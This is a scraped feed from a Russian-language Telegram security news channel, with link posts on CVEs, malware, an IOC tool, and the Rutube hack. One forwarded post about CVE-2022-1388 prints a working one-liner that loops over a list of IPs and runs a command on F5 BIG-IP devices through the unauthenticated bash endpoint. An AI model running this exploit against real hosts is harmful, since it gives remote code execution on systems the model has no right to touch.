CVE-2022-25262
PoC + подробности уязвимости CVE-2022-25262 | JetBrains Hub single-click SAML response takeover
https://github.com/yuriisanin/CVE-2022-25262
Дневник Безопасника 🛡
PoC + подробности уязвимости CVE-2022-25262 | JetBrains Hub single-click SAML response takeover
https://github.com/yuriisanin/CVE-2022-25262
Дневник Безопасника 🛡
GitHub
GitHub - yuriisanin/CVE-2022-25262: PoC + vulnerability details for CVE-2022-25262 / JetBrains Hub single-click SAML response takeover
PoC + vulnerability details for CVE-2022-25262 / JetBrains Hub single-click SAML response takeover - yuriisanin/CVE-2022-25262
New BotenaGo Malware Variant Executes Stealth Attacks Against DVR Devices
▶️ Источник
Дневник Безопасника 🛡
▶️ Источник
Дневник Безопасника 🛡
LHN
New BotenaGo Malware Variant Executes Stealth Attacks Against DVR Devices
Researchers have detected a new variant of the BotenaGo malware attacking DVR devices. This malware previously caught attention when it targeted IoT devices. Now, it seems the malware has improved to target DVR systems while
Lupo — Malware IOC Extractor
Отладочный модуль для автоматизации анализа вредоносных программ. Пошаговую инструкцию по использованию Lupo с изображениями и инструкциями ознакомиться здесь.
https://github.com/malienist/lupo
Дневник Безопасника 🛡
Отладочный модуль для автоматизации анализа вредоносных программ. Пошаговую инструкцию по использованию Lupo с изображениями и инструкциями ознакомиться здесь.
https://github.com/malienist/lupo
Дневник Безопасника 🛡
Medium
Lupo — Malware IOC Extractor
Debugging module for Malware Analysis Automation
Forwarded from iMelnik
Twitter гремит о CVE-2022-1388 она же RCE в F5 BIG-IP(сервиса для доставки приложений).
Всё гениальное как и всегда оказалось простым, POST запрос и JSON...🤭
пример простого скрипта чтобы пробежаться по множеству IP и проверить их на уязвимость ;)
ну и сам PoC для тех кому интересно
Всё гениальное как и всегда оказалось простым, POST запрос и JSON...🤭
пример простого скрипта чтобы пробежаться по множеству IP и проверить их на уязвимость ;)
cat ips.txt | while read ip; do curl -su admin -H "Content-Type: application/json" http://$ip/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}';doneну и сам PoC для тех кому интересно
A vulnerability (CVE-2022-29972) in Microsoft Azure Synapse and Azure Data Factory could have led to remote code execution attacks, allowing attackers to gain control of other Synapse workspaces and leak sensitive data, including Azure service keys and API tokens, as well as passwords for other services.
▶️ Источник
Дневник Безопасника 🛡
▶️ Источник
Дневник Безопасника 🛡
Минцифры РФ создаст пул вендоров по закупке нужного количества серверов
▶️ Источник
Дневник Безопасника 🛡
▶️ Источник
Дневник Безопасника 🛡
CISOCLUB
Минцифры РФ создаст пул вендоров по закупке нужного количества серверов
Минцифры РФ сформирует перечень вендоров-провайдеров, ответственных за приобретение нужного объема серверов для отечественных ИТ-компаний. С соответствующим заявлением выступил вице-премьер Дмитрий Чернышенко, сообщает ТАСС. «Минцифры РФ создаёт сейчас пул…
The Village: Rutube «не подлежит восстановлению» после хакерской атаки
▶️ Источник
Дневник Безопасника 🛡
▶️ Источник
Дневник Безопасника 🛡
SecurityLab.ru
The Village: Rutube «не подлежит восстановлению» после хакерской атаки
По данным источников издания, в результате атаки код сайта был полностью удален.